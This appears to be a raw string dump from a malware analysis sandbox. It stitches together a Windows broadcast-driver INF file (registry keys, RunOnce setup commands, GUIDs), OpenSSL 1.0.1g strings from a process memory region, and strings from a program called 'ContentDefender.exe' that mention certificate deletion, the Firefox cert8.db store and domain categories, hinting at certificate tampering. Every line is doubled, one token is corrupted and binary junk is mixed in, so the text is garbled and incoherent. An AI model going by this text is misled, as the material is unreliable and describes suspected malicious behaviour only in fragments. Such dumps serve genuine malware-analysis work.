[BDA.NodeRegistration]
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
[BDA.PinNameRegistration]
[BDA.PinNameRegistration]
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
[BDA.DeviceInstallation]
[BDA.DeviceInstallation]
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
[NdisIP.Installation]
[NdisIP.Installation]
[NdisIP.Installation.NT]
[NdisIP.Installation.NT]
HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
[BDA.FilterRegistration]
[BDA.FilterRegistration]
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
[BDA.RegisterDlls]
[BDA.RegisterDlls]
11,,BdaPlgin.ax,1
11,,BdaPlgin.ax,1
11,,MsDvbNp.ax,1
11,,MsDvbNp.ax,1
11,,Mpeg2Data.ax,1
11,,Mpeg2Data.ax,1
11,,PsisRndr.ax,1
11,,PsisRndr.ax,1
11,,PsisDecd.dll,1
11,,PsisDecd.dll,1
[BDA.PluginRegistration]
[BDA.PluginRegistration]
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[BdaDriver.Files]
[BdaDriver.Files]
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
[BdaFilter.Files]
[BdaFilter.Files]
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
[BdaPlugIn.Files]
[BdaPlugIn.Files]
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
; Bda.TXT is appended here
; Bda.TXT is appended here
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
; Note that some category GUIDs are defined in ks.inf
; Note that some category GUIDs are defined in ks.inf
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
; Note that some pin and filter name GUIDs are defined in ks.inf
; Note that some pin and filter name GUIDs are defined in ks.inf
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
; Note that some categorys are defined in ks.inf
; Note that some categorys are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
Pin.Name.AtscTS="MPEG2
Pin.Name.AtscTS="MPEG2
Pin.Name.IPV4="IPv4"
Pin.Name.IPV4="IPv4"
Pin.Name.MPE="MPE"
Pin.Name.MPE="MPE"
Pin.Name.NABTS="NABTS"
Pin.Name.NABTS="NABTS"
()* ,|-.
()* ,|-.
%original file name%.exe_1040_rwx_0A471000_00048000:
RWj%Sj
RWj%Sj
H%x@J
H%x@J
SSLv2 part of OpenSSL 1.0.1g 7 Apr 2014
SSLv2 part of OpenSSL 1.0.1g 7 Apr 2014
s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)
s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)
c->iv_len session->key_arg)
c->iv_len session->key_arg)
s->s2->key_material_length s2->key_material
s->s2->key_material_length s2->key_material
GOST signature length is %d
GOST signature length is %d
SSLv3 part of OpenSSL 1.0.1g 7 Apr 2014
SSLv3 part of OpenSSL 1.0.1g 7 Apr 2014
TLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
TLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
key expansion
key expansion
client write key
client write key
server write key
server write key
%s:%d: rec->data != rec->input
%s:%d: rec->data != rec->input
DTLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
DTLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
((long)msg_hdr->msg_len) > 0
((long)msg_hdr->msg_len) > 0
invalid state reached %s:%d
invalid state reached %s:%d
s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num
s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num
s->d1->w_msg_hdr.msg_len ((s->version==DTLS1_VERSION)?DTLS1_CCS_HEADER_LENGTH:3) == (unsigned int)s->init_num
s->d1->w_msg_hdr.msg_len ((s->version==DTLS1_VERSION)?DTLS1_CCS_HEADER_LENGTH:3) == (unsigned int)s->init_num
s->init_num == (int)s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH
s->init_num == (int)s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH
retransmit: message %d non-existant
retransmit: message %d non-existant
OpenSSL 1.0.1g 7 Apr 2014
OpenSSL 1.0.1g 7 Apr 2014
.\ssl\ssl_cert.c
.\ssl\ssl_cert.c
%s/%s
%s/%s
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT56
EXPORT40
EXPORT40
EXPORT
EXPORT
export
export
SSLv3 read certificate verify B
SSLv3 read certificate verify B
SSLv3 read certificate verify A
SSLv3 read certificate verify A
SSLv3 read client key exchange B
SSLv3 read client key exchange B
SSLv3 read client key exchange A
SSLv3 read client key exchange A
SSLv3 read client certificate B
SSLv3 read client certificate B
SSLv3 read client certificate A
SSLv3 read client certificate A
SSLv3 write certificate request B
SSLv3 write certificate request B
SSLv3 write certificate request A
SSLv3 write certificate request A
SSLv3 write key exchange B
SSLv3 write key exchange B
SSLv3 write key exchange A
SSLv3 write key exchange A
SSLv3 write certificate B
SSLv3 write certificate B
SSLv3 write certificate A
SSLv3 write certificate A
SSLv2 X509 read server certificate
SSLv2 X509 read server certificate
SSLv2 write request certificate D
SSLv2 write request certificate D
SSLv2 write request certificate C
SSLv2 write request certificate C
SSLv2 write request certificate B
SSLv2 write request certificate B
SSLv2 write request certificate A
SSLv2 write request certificate A
SSLv2 read client master key B
SSLv2 read client master key B
SSLv2 read client master key A
SSLv2 read client master key A
SSLv3 write certificate verify B
SSLv3 write certificate verify B
SSLv3 write certificate verify A
SSLv3 write certificate verify A
SSLv3 write client key exchange B
SSLv3 write client key exchange B
SSLv3 write client key exchange A
SSLv3 write client key exchange A
SSLv3 write client certificate D
SSLv3 write client certificate D
SSLv3 write client certificate C
SSLv3 write client certificate C
SSLv3 write client certificate B
SSLv3 write client certificate B
SSLv3 write client certificate A
SSLv3 write client certificate A
SSLv3 read server certificate request B
SSLv3 read server certificate request B
SSLv3 read server certificate request A
SSLv3 read server certificate request A
SSLv3 read server key exchange B
SSLv3 read server key exchange B
SSLv3 read server key exchange A
SSLv3 read server key exchange A
SSLv3 read server certificate B
SSLv3 read server certificate B
SSLv3 read server certificate A
SSLv3 read server certificate A
SSLv2 X509 read client certificate
SSLv2 X509 read client certificate
SSLv2 write client certificate D
SSLv2 write client certificate D
SSLv2 write client certificate C
SSLv2 write client certificate C
SSLv2 write client certificate B
SSLv2 write client certificate B
SSLv2 write client certificate A
SSLv2 write client certificate A
SSLv2 write client master key B
SSLv2 write client master key B
SSLv2 write client master key A
SSLv2 write client master key A
2SSH_B
2SSH_B
2SSH_A
2SSH_A
bad certificate hash value
bad certificate hash value
bad certificate status response
bad certificate status response
certificate unobtainable
certificate unobtainable
unsupported extension
unsupported extension
export restriction
export restriction
certificate unknown
certificate unknown
certificate expired
certificate expired
certificate revoked
certificate revoked
unsupported certificate
unsupported certificate
bad certificate
bad certificate
no certificate
no certificate
os.length session_id)
os.length session_id)
%ld (%s)
%ld (%s)
Compression: %d (%s)
Compression: %d (%s)
Compression: %d
Compression: %d
Key-Arg :
Key-Arg :
Master-Key:
Master-Key:
Cipher : %s
Cipher : %s
Protocol : %s
Protocol : %s
wrong number of key bits
wrong number of key bits
unsupported status type
unsupported status type
unsupported ssl version
unsupported ssl version
unsupported protocol
unsupported protocol
unsupported elliptic curve
unsupported elliptic curve
unsupported digest type
unsupported digest type
unsupported compression algorithm
unsupported compression algorithm
unsupported cipher
unsupported cipher
unknown pkey type
unknown pkey type
unknown key exchange type
unknown key exchange type
unknown certificate type
unknown certificate type
unable to find public key parameters
unable to find public key parameters
unable to extract public key
unable to extract public key
unable to decode ecdh certs
unable to decode ecdh certs
unable to decode dh certs
unable to decode dh certs
tried to use unsupported cipher
tried to use unsupported cipher
tls peer did not respond with certificate list
tls peer did not respond with certificate list
tls illegal exporter label
tls illegal exporter label
tls client cert req with anon cipher
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 bad certificate hash value
tlsv1 alert export restriction
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert certificate expired
sslv3 alert bad certificate
sslv3 alert bad certificate
signature for non signing certificate
signature for non signing certificate
reuse cert type not zero
reuse cert type not zero
reuse cert length not zero
reuse cert length not zero
public key not rsa
public key not rsa
public key is not rsa
public key is not rsa
public key encrypt error
public key encrypt error
peer error unsupported certificate type
peer error unsupported certificate type
peer error no certificate
peer error no certificate
peer error certificate
peer error certificate
peer did not return a certificate
peer did not return a certificate
null ssl method passed
null ssl method passed
no publickey
no publickey
no private key assigned
no private key assigned
no privatekey
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert received
no client cert method
no client cert method
no ciphers passed
no ciphers passed
no certificate specified
no certificate specified
no certificate set
no certificate set
no certificate returned
no certificate returned
no certificate assigned
no certificate assigned
no certificates returned
no certificates returned
missing tmp rsa pkey
missing tmp rsa pkey
missing tmp rsa key
missing tmp rsa key
missing tmp ecdh key
missing tmp ecdh key
missing tmp dh key
missing tmp dh key
missing rsa signing cert
missing rsa signing cert
missing rsa encrypting cert
missing rsa encrypting cert
missing rsa certificate
missing rsa certificate
missing export tmp rsa key
missing export tmp rsa key
missing export tmp dh key
missing export tmp dh key
missing dsa signing cert
missing dsa signing cert
missing dh rsa cert
missing dh rsa cert
missing dh key
missing dh key
missing dh dsa cert
missing dh dsa cert
krb5 server rd_req (keytab perms?)
krb5 server rd_req (keytab perms?)
key arg too long
key arg too long
invalid ticket keys length
invalid ticket keys length
http request
http request
https proxy request
https proxy request
error generating tmp rsa key
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for signing
ecc cert not for key agreement
ecc cert not for key agreement
cert length mismatch
cert length mismatch
certificate verify failed
certificate verify failed
bad ecc cert
bad ecc cert
bad dh pub key length
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
TLS1_SETUP_KEY_BLOCK
TLS1_EXPORT_KEYING_MATERIAL
TLS1_EXPORT_KEYING_MATERIAL
tls1_cert_verify_mac
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_PKEY
SSL_SET_CERT
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_PKEY
SSL_GET_SERVER_SEND_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_CTX_check_private_key
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_check_private_key
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_INST
SSL_CERT_DUP
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_ADD_CERT_TO_BUF
SSL3_ADD_CERT_TO_BUF
SSL2_SET_CERTIFICATE
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_ADD_CERT_TO_BUF
DTLS1_ADD_CERT_TO_BUF
CLIENT_MASTER_KEY
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
CLIENT_CERTIFICATE
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\ssleay32.pdb
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\ssleay32.pdb
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
_malloc_crt
_malloc_crt
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
@.MNl1
@.MNl1
ContentDefender.exe_932:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
w%s(
w%s(
?%u4W
?%u4W
Certificate name reading failed
Certificate name reading failed
Certificate %s, Is our: %s
Certificate %s, Is our: %s
Certificate deleted
Certificate deleted
Certificate deletion failed
Certificate deletion failed
Store %s opening %s
Store %s opening %s
Check folder for certificate:
Check folder for certificate:
cert8.db
cert8.db
Can't open category key
Can't open category key
For category %s enable %s detected
For category %s enable %s detected
----------------- Domains in category %s-----------------
----------------- Domains in category %s-----------------
Category %s enabled: %s
Category %s enabled: %s
TCP rule setup failed
TCP rule setup failed
Invalid JSON array: %c%c%c%c
Invalid JSON array: %c%c%c%c
